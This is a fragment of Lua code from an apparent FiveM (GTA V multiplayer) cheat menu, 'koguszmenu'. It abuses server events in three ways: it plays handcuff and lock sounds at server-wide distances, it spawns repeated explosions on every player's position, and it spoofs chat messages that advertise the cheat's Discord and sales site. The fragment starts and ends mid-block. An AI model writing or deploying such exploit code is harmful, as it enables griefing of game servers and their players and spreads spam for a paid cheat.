						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/twt koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/report koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/ooc koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
								TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
								end
				


														end
														end
														end
													
													
																)